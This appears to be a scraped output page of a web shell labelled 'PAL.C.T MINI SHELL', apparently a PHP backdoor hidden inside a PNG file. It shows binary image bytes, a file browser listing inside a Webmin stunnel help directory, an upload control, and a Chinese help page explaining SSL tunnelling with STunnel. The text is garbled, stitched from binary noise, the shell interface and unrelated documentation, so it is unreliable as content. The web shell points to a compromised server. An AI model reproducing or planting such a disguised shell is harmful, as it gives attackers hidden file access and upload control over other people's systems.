php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.zh.auto.html

<header> SSL隧道简介</header> SSL是一种用于在TCP连接通过网络传输时对数据进行加密的协议。它最初是为了保护Web浏览器和服务器之间的流量而开发的,但可用于加密通常通过TCP协议发送的任何类型的数据流。 <p> SSL协议允许客户端和服务器彼此进行身份验证,以便客户端可以确保它确实连接到它认为是的主机。这是通过使用证书来完成的,这些证书由客户端认可的证书颁发机构颁发(以便可以对其进行验证)并与特定的主机名关联。没有证书,攻击者可以将SSL连接重定向到自己的服务器,并从认为与真实服务器通信的客户端捕获敏感信息。 <p>攻击者可以通过访问经过的网络之一来捕获和读取未经加密的Internet上传输的任何数据。甚至可以轻松地在LAN上的客户端和服务器系统之间传输数据。当您连接到telnet,FTP或POP3服务器时,您的密码是通过网络发送的,因此可以被攻击者捕获。 <p>只有在客户端和服务器均支持SSL的情况下,SSL才能用于保护数据。大多数Web浏览器和邮件客户端都可以建立SSL加密的HTTP,POP3和IMAP连接,但并非所有Web和POP3服务器都可以接受它们。特别是POP3很难保护,因为大多数Unix系统随附的标准服务器根本不支持SSL。幸运的是,尽管有解决方案-STunnel。 <p> STunnel是一个简单的程序,可以将未加密的连接转换为SSL加密的连接。通常将其设置为从超级服务器(如inetd或xinetd)运行,然后运行某些其他程序(如不支持SSL的POP3服务器)。这种设计使其可以保护任何通常不受inetd运行的服务器,例如telnet,NNTP和IMAP服务器。 <p>但是,并非所有服务器都可以使用加密来有效地保护,因为不存在任何客户端可以在SSL模式下使用它们。例如,我从未听说过可以使用SSL的telnet或FTP客户端,因为通用的SSH程序包已经允许加密的远程登录和文件传输。 <p>通过此Webmin模块,可以轻松设置运行STunnel来启动某些服务器程序的超级服务器服务。即使可以使用Internet服务模块手动完成此操作,该程序也专门用于设置和配置STunnel。它会自动检测您是否安装了inetd和/或xinetd,读取它们的配置以检查现有的SSL隧道,并在创建新隧道时将其添加到其中。如果同时安装了两者,则新的SSL隧道将添加到xinetd配置中,因为我认为这是两者中的佼佼者。 <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`